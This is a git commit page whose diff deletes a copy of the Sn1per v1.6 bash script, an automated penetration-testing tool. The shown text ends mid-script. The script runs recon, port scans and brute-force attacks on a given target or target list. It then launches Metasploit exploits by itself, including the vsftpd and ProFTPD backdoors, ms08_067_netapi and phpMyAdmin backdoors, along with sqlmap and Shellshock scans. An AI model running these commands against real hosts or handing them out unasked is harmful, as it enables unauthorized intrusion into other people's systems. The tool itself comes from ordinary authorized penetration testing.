BitMaster/Sn1per
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge https://github.com/1N3/Sniper

Browse Source
This commit is contained in:
root
2016-05-06 08:25:19 -07:00
parent 11b2022b26 f365872a27
commit 024add1bcd
1 changed files with 0 additions and 920 deletions
Download Patch File Download Diff File Expand all files Collapse all files

920
sniper~
View File

@@ -1,920 +0,0 @@
#!/bin/bash
# + -- --=[Sn1per v1.6 by 1N3
# + -- --=[http://crowdshield.com
#
# Sn1per - Automated Pentest Recon Tool
#
# FEATURED:
# - Automatically collect recon info (ie. whois, ping, DNS, etc.)
# - Automatically collects Google hacking recon info
# - Automatically run port scans
# - Automatically brute force sub-domains via DNS
# - Automatically run targeted nmap scripts against open ports
# - Automatically scans all web applications
# - Automatically brute forces all open services
# - Automatically runs targeted metasploit scan and exploit modules
# - Automatically scan multiple hosts
#
# INSTALL:
# ./install.sh - Installs all dependencies. Best run from Kali Linux.
#
# USAGE:
# ./sniper <target>
# ./sniper <target> <report>
# ./sniper <target> stealth <report>
# ./sniper <target> port <portnum>
# ./sniper <target> web <report>
# ./sniper <target> nobrute <report>
# ./sniper <targets.txt> airstrike <report>
# ./sniper <targets.txt> nuke <report>
#
# UNCOMMENT AND SET TARGET DIR FOR UNIVERSAL ACCESS (ie. sniper <target>)
#cd /pentest/web/Sn1per/
clear
TARGET="$1"
MODE="$2"
OPT1="$3"
LOOT_DIR="loot"
CMSMAP="CMSmap/cmsmap.py"
SAMRDUMP="bin/samrdump.py"
DNSDICT6="bin/dnsdict6"
INURLBR="bin/inurlbr.php"
USER_FILE="BruteX/wordlists/simple-users.txt"
PASS_FILE="BruteX/wordlists/password.lst"
DNS_FILE="BruteX/wordlists/namelist.txt"
SUPER_MICRO_SCAN="SuperMicro-Password-Scanner/supermicro_scan.sh"
THREADS="30"
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
RESET='\e[0m'
REGEX='^[0-9]+$'
DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
if [ -z $TARGET ]; then
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
echo -e "$OKORANGE + -- --=[sn1per v1.6 by 1N3"
echo -e "$OKORANGE + -- --=[Usage: sn1per <target>"
exit
fi
if [[ ${TARGET:0:1} =~ $REGEX ]];
then
SCAN_TYPE="IP"
else
SCAN_TYPE="DOMAIN"
fi
clear
if [ "$MODE" = "report" ]; then
./sniper $TARGET | tee ./loot/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
exit
fi
if [ "$MODE" = "web" ]; then
if [ "$OPT1" = "report" ]; then
./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
exit
fi
fi
if [ "$MODE" = "nobrute" ]; then
if [ "$OPT1" = "report" ]; then
./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
fi
fi
if [ "$MODE" = "stealth" ]; then
if [ "$OPT1" = "report" ]; then
./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
exit
fi
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
echo -e "$OKORANGE + -- --=[sn1per v1.6 by 1N3"
echo -e "$OKRED "
echo -e "$OKRED ./\."
echo -e "$OKRED ./ '\."
echo -e "$OKRED \. '\."
echo -e "$OKRED '\. '\."
echo -e "$OKRED '\. '\."
echo -e "$OKRED '\. '\."
echo -e "$OKRED ./ '\."
echo -e "$OKRED ./ ____'\."
echo -e "$OKRED ./ < '\."
echo -e "$OKRED \-------\ '> '\."
echo -e "$OKRED '\=====> ___< '\."
echo -e "$OKRED ./-----/ __________'\."
echo -e "$OKRED "' \.------\ _____ ___(_)(_\."\'
echo -e "$OKRED '\=====> < ./'"
echo -e "$OKRED ./-----/ '> ./"
echo -e "$OKRED \. ___< ./"
echo -e "$OKRED '\. ./"
echo -e "$OKRED '\. ./"
echo -e "$OKRED '\. ./"
echo -e "$OKRED ./ ./"
echo -e "$OKRED ./ ./ Carl Pilcher"
echo -e "$OKRED ./ ./"
echo -e "$OKRED ./ ./"
echo -e "$OKRED ./ ./"
echo -e "$OKRED \. ./"
echo -e "$OKRED '\. ./"
echo -e "$OKRED '\/"
echo -e "$RESET"
echo -e "$OKGREEN + -- --=[Launching stealth scan: $TARGET $RESET"
echo -e "$OKGREEN $RESET"
echo -e "$OKGREEN################################### Running recon #################################$RESET"
nslookup $TARGET
host $TARGET
if [ $SCAN_TYPE == "DOMAIN" ];
then
dig -x $TARGET
whois $TARGET
theharvester -d $TARGET -l 200 -b all -v -t 2> /dev/null
dnsrecon -d $TARGET
dnsrecon -d $TARGET -t zonewalk
dnsrecon -d $TARGET -t axfr
dnsenum $TARGET -f BruteX/wordlists/namelist.txt
mv -f *_ips.txt loot/ 2>/dev/null
python Sublist3r/sublist3r.py -d $TARGET -vvv 2>/dev/null
fi
echo ""
echo -e "$OKGREEN################################### Running passive scans #########################$RESET"
unicornscan $TARGET:21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,10000,49152 2> /dev/null
xprobe2 $TARGET
wafw00f http://$TARGET
whatweb http://$TARGET
xsstracer $TARGET 80
sslscan --no-failed $TARGET
cutycapt --url=http://$TARGET --out=loot/$TARGET-port80.jpg
echo -e "$OKGREEN################################### Done! #########################################$RESET"
clear
exit
fi
if [ "$MODE" = "airstrike" ]; then
if [ "$OPT1" = "report" ]; then
./sniper $TARGET $MODE | tee ./loot/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
exit
fi
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
echo -e "$OKORANGE + -- --=[sn1per v1.6 by 1N3"
echo -e "$OKRED |"
echo -e "$OKRED | |"
echo -e "$OKRED | -/_\-"
echo -e "$OKRED -/_\- ______________(/ . \)______________"
echo -e "$OKRED ____________(/ . \)_____________ \___/ <>"
echo -e "$OKRED <> \___/ <> <>"
echo -e "$OKRED "
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED <>"
echo -e "$OKRED ||"
echo -e "$OKRED || BIG"
echo -e "$OKRED _____ __ <> (^)))^ BOOM!"
echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )"
echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )"
echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||"
echo -e "$OKRED | ||. | | | ||| |||||"
echo -e "$OKRED __________________________________________________________"
echo -e "$OKRED Bomb raid (contributed by Michael aka SNOOPY@DRYCAS.CLUB.CC.CMU.EDU)"
echo -e "$RESET"
for a in `cat $TARGET`;
do
echo -e "$OKGREEN + -- --=[Launching airstrike: $a $RESET"
echo -e "$OKGREEN################################### Running recon #################################$RESET"
nslookup $a
host $a
if [[ ${a:0:1} =~ $REGEX ]];
then
SCAN_TYPE="IP"
else
SCAN_TYPE="DOMAIN"
fi
if [ $SCAN_TYPE == "DOMAIN" ];
then
dig -x $a
whois $a
theharvester -d $a -l 200 -b all -v -t 2> /dev/null
dnsrecon -d $a
dnsrecon -d $a -t zonewalk
dnsrecon -d $a -t axfr
dnsenum $a -f BruteX/wordlists/namelist.txt
mv -f *_ips.txt loot/ 2>/dev/null
python Sublist3r/sublist3r.py -d $a -vvv 2>/dev/null
fi
echo ""
echo -e "$OKGREEN################################### Running passive scans #########################$RESET"
unicornscan $a:21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,10000,49152 2> /dev/null
xprobe2 $a
wafw00f http://$a
whatweb http://$a
xsstracer $a 80
sslscan --no-failed $a
cutycapt --url=http://$a --out=loot/$a-port80.jpg
echo -e "$OKGREEN################################### Done! #########################################$RESET"
clear
done;
exit
fi
if [ "$MODE" = "port" ]; then
if [ -z "$OPT1" ]; then
echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET"
exit
fi
fi
if [ "$MODE" = "nuke" ]; then
if [ "$OPT1" = "report" ]; then
./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
exit
fi
for a in `cat $TARGET`; do
echo -e "$OKRED "
echo -e "$OKRED ____"
echo -e "$OKRED __,-~~/~ \`---."
echo -e "$OKRED _/_,---( , )"
echo -e "$OKRED __ / < / ) \___"
echo -e "$OKRED - ------===;;;'====------------------===;;;===----- - -"
echo -e "$OKRED \/ ~'~'~'~'~'~\~'~)~'/"
echo -e "$OKRED (_ ( \ ( > \)"
echo -e "$OKRED \_( _ < >_>'"
echo -e "$OKRED ~ \`-i' ::>|--\""
echo -e "$OKRED I;|.|.|"
echo -e "$OKRED <|i::|i|\`."
echo -e "$OKRED (\` ^''\`-' ')"
echo -e "$OKRED --------------------------------------------------------- $RESET"
echo -e "$OKGREEN + -- --=[WARNING! Nuking ALL target! $RESET"
./sniper $a
clear
done
fi
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
echo -e "$OKORANGE + -- --=[sn1per v1.6 by 1N3"
echo -e "$RESET"
echo -e "$OKGREEN################################### Running recon #################################$RESET"
nslookup $TARGET
host $TARGET
xprobe2 $TARGET
if [ $SCAN_TYPE == "DOMAIN" ];
then
dig -x $TARGET
whois $TARGET
theharvester -d $TARGET -l 200 -b all -v -t 2> /dev/null
dnsrecon -d $TARGET
dnsrecon -d $TARGET -t zonewalk
dnsrecon -d $TARGET -t axfr
dnsenum $TARGET -f BruteX/wordlists/namelist.txt
mv -f *_ips.txt loot/ 2>/dev/null
python Sublist3r/sublist3r.py -d $TARGET -vvv 2>/dev/null
fi
echo ""
echo -e "$OKGREEN################################### Pinging host ###################################$RESET"
ping -c 1 $TARGET
echo ""
echo -e "$OKGREEN################################### Running TCP port scan ##########################$RESET"
if [ -z "$OPT1" ]; then
nmap -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,10000,49152 $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
echo -e "$OKGREEN################################### Running UDP port scan ##########################$RESET"
nmap -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
elif [ "$OPT1" == "web" ]; then
nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
else
nmap -T5 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml
echo -e "$OKGREEN################################### Running UDP port scan ##########################$RESET"
nmap -sU -T5 -p U:$OPT1 --open $TARGET
fi
echo ""
echo -e "$OKGREEN################################### Running Intrusive Scans ########################$RESET"
port_21=`grep 'portid="21"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_22=`grep 'portid="22"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_23=`grep 'portid="23"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_25=`grep 'portid="25"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_53=`grep 'portid="53"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_79=`grep 'portid="79"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_80=`grep 'portid="80"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_110=`grep 'portid="110"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_111=`grep 'portid="111"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_135=`grep 'portid="135"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_139=`grep 'portid="139"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_162=`grep 'portid="162"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_389=`grep 'portid="162"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_443=`grep 'portid="443"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_445=`grep 'portid="445"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_512=`grep 'portid="512"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_513=`grep 'portid="513"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_514=`grep 'portid="514"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_1099=`grep 'portid="1099"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_1524=`grep 'portid="1524"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_2049=`grep 'portid="2049"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_2121=`grep 'portid="2121"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_3128=`grep 'portid="3128"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
if [ -z "$port_21" ]
then
echo -e "$OKRED+ -- --=[Port 21 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 21 opened... running tests...$RESET"
nmap -sV -sC -T5 -p 21 --script=ftp-* $TARGET
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
if [ -z "$port_22" ]
then
echo -e "$OKRED+ -- --=[Port 22 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 22 opened... running tests...$RESET"
nmap -sV -sC -T5 -p 22 --script=ssh-* $TARGET
msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$PWD"/BruteX/wordlists/simple-users.txt; setg RHOSTS "$TARGET"; setg "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
fi
if [ -z "$port_23" ]
then
echo -e "$OKRED+ -- --=[Port 23 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 23 opened... running tests...$RESET"
echo ""
cisco-torch -A $TARGET
nmap -sV -T5 --script=telnet* -p 23 $TARGET
msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;"
fi
if [ -z "$port_25" ]
then
echo -e "$OKRED+ -- --=[Port 25 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 25 opened... running tests...$RESET"
nmap -sV -T5 --script=smtp* -p 25 $TARGET
smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET
msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;"
fi
if [ -z "$port_53" ]
then
echo -e "$OKRED+ -- --=[Port 53 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 53 opened... running tests...$RESET"
nmap -sV -T5 --script=dns* -p U:53,T:53 $TARGET
fi
if [ -z "$port_79" ]
then
echo -e "$OKRED+ -- --=[Port 79 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 79 opened... running tests...$RESET"
nmap -sV -T5 --script=finger* -p 79 $TARGET
bin/fingertool.sh $TARGET BruteX/wordlists/simple-users.txt
fi
if [ -z "$port_80" ]
then
echo -e "$OKRED+ -- --=[Port 80 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 80 opened... running tests...$RESET"
wafw00f http://$TARGET
echo ""
whatweb http://$TARGET
xsstracer $TARGET 80
echo ""
echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET | egrep -i 'X-Content' | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET | egrep -i 'X-Frame' | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET | egrep -i 'X-XSS' | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I -X OPTIONS http://$TARGET | grep Allow | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I -X TRACE http://$TARGET | grep TRACE | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
curl -s --insecure -x http://$TARGET:80 -L http://crowdshield.com/.testing/openproxy.txt | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE"
curl -s --insecure http://$TARGET/crossdomain.xml | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE"
curl -s --insecure http://$TARGET/clientaccesspolicy.xml | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE"
curl -s --insecure http://$TARGET/robots.txt | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE"
curl -s --insecure http://$TARGET/sitemap.xml | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I http://$TARGET | egrep -i "Cookie:" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE"
curl -s --insecure http://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10
curl -s --insecure http://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
echo ""
echo -e "$RESET"
nikto -h http://$TARGET
cutycapt --url=http://$TARGET --out=loot/$TARGET-port80.jpg
if [ "$MODE" = "web" ]
then
nmap -v -sV -T5 -p 80 --script=http-enum,http-feed,http-open-proxy,http-headers,http-cors,http-server-header,http-php-version,http-form-brute,http-iis-short-name-brute,http-waf-fingerprint,http-auth,http-trace,http-iis-webdav-vuln,http-useragent-tester,http-vuln-cve2011-3368,http-userdir-enum,http-passwd,http-csrf,http-wordpress-enum,http-frontpage-login,http-dombased-xss,http-phpself-xss,http-sql-injection,http-drupal-enum-users,http-referer-checker,http-vuln-cve2009-3960,http-methods,http-open-redirect,http-vuln-cve2011-3192,http-stored-xss,http-vuln-cve2013-0156,http-put,http-proxy-brute,http-rfi-spider,http-method-tamper,http-phpmyadmin-dir-traversal $TARGET
dirb http://$TARGET
wpscan --url http://$TARGET --batch
wpscan --url http://$TARGET/wordpress/ --batch
python $CMSMAP -t http://$TARGET
python $CMSMAP -t http://$TARGET/wordpress/
arachni http://$TARGET --output-only-positives
sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
python shocker/shocker.py -H $TARGET --cgilist shocker/shocker-cgi_list --port 80
fi
if [ $SCAN_TYPE == "DOMAIN" ];
then
goohak $TARGET > /dev/null
php $INURLBR --dork "site:$TARGET" -s $LOOT_DIR/inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
GHDB="1"
fi
fi
if [ -z "$port_110" ]
then
echo -e "$OKRED+ -- --=[Port 110 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 110 opened... running tests...$RESET"
nmap -sV -T5 --script=pop* -p 110 $TARGET
fi
if [ -z "$port_111" ]
then
echo -e "$OKRED+ -- --=[Port 111 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 111 opened... running tests...$RESET"
showmount -a $TARGET
showmount -d $TARGET
showmount -e $TARGET
fi
if [ -z "$port_135" ]
then
echo -e "$OKRED+ -- --=[Port 135 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 135 opened... running tests...$RESET"
rpcinfo -p $TARGET
nmap -p 135 -T5 --script=rpc* $TARGET
fi
if [ -z "$port_139" ]
then
echo -e "$OKRED+ -- --=[Port 139 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 139 opened... running tests...$RESET"
SMB="1"
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
if [ -z "$port_162" ]
then
echo -e "$OKRED+ -- --=[Port 162 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 162 opened... running tests...$RESET"
for a in `cat BruteX/wordlists/snmp-community-strings.txt`; do snmpwalk $TARGET -c $a; done;
nmap -p 162 --script=snmp* $TARGET
fi
if [ -z "$port_389" ]
then
echo -e "$OKRED+ -- --=[Port 389 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 389 opened... running tests...$RESET"
nmap -p 389 -T5 --script=ldap* $TARGET
fi
if [ -z "$port_443" ]
then
echo -e "$OKRED+ -- --=[Port 443 closed... skipping.$RESET"
else
echo -e "$OKGREEN+ -- --=[Port 443 opened... running tests...$RESET"
wafw00f https://$TARGET
echo ""
whatweb https://$TARGET
echo ""
sslscan --no-failed $TARGET
echo ""
cd MassBleed
./massbleed $TARGET port 443
cd ..
echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET | egrep -i 'X-Content' | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET | egrep -i 'X-Frame' | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET | egrep -i 'X-XSS' | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I -X OPTIONS https://$TARGET | grep Allow
echo ""
echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I -X TRACE https://$TARGET | grep TRACE
echo ""
echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
curl -x https://$TARGET:443 -L https://crowdshield.com/.testing/openproxy.txt -s --insecure | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE"
curl -s --insecure https://$TARGET/crossdomain.xml | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE"
curl -s --insecure https://$TARGET/clientaccesspolicy.xml | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE"
curl -s --insecure https://$TARGET/robots.txt | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE"
curl -s --insecure https://$TARGET/sitemap.xml | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I https://$TARGET | egrep -i "Cookie:" | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE"
curl -s --insecure https://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10
curl -s --insecure https://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
echo ""
echo -e "$RESET"
nikto -h https://$TARGET
cutycapt --url=https://$TARGET --out=loot/$TARGET-port443.jpg
if [ "$MODE" = "web" ]
then
